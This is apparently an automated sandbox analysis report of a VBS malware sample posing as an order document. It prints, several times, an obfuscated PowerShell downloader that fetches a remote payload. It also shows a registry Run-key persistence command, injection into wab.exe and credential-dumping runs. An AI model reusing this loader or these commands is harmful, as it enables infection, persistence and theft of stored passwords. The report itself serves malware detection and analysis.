              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00446D8B13_2_00446D8B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00406E8F13_2_00406E8F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040503814_2_00405038
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041208C14_2_0041208C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004050A914_2_004050A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040511A14_2_0040511A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043C13A14_2_0043C13A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004051AB14_2_004051AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044930014_2_00449300
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0040D32214_2_0040D322
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A4F014_2_0044A4F0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043A5AB14_2_0043A5AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041363114_2_00413631
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044669014_2_00446690
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A73014_2_0044A730
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004398D814_2_004398D8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_004498E014_2_004498E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0044A88614_2_0044A886
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0043DA0914_2_0043DA09
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00438D5E14_2_00438D5E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00449ED014_2_00449ED0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_0041FE8314_2_0041FE83
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 14_2_00430F5414_2_00430F54
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004050C215_2_004050C2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004014AB15_2_004014AB
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040513315_2_00405133
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004051A415_2_004051A4
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040124615_2_00401246
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040CA4615_2_0040CA46
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040523515_2_00405235
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_004032C815_2_004032C8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0040168915_2_00401689
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00402F6015_2_00402F60
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: String function: 00416760 appears 69 times
              Source: REVISED NEW ORDER 7936-2024.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
              Source: amsi64_6868.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2912.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 6868, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@23/222@2/3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,13_2_004182CE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,15_2_00410DE1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,13_2_00418758
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,13_2_00413D4C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,13_2_0040B58D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\deklaration.SupJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSU
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivj52lbz.scn.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6868
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2912
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: wab.exe, wab.exe, 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: wab.exe, 0000000D.00000003.2478706827.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2479616088.00000000009D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_14-32948
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\aywoauvyhwlgrptelemijrt"
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\cajhaffzuedltvhiuphbmeobpae"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\deklaration.Sup && echo $"Jump to behavior
